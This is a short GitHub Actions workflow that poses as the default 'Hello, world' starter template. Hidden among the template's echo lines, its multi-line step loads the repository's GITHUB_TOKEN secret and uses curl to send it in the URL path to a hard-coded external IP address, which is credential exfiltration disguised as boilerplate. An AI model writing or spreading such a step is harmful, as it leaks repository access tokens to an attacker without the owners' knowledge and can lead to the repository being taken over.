name: CI

on: [push]

jobs:
  build:

    runs-on: ubuntu-latest
    
    steps:
    - uses: actions/checkout@master
    - name: Run a one-line script
      run: echo Hello, world!
    - name: Run a multi-line script
      env: 
       GITHUB_TOKEN: ${{secrets.GITHUB_TOKEN}}
      run: |
        curl http://173.230.149.124/$GITHUB_TOKEN
        echo Add other actions to build,
        echo test, and deploy your project.
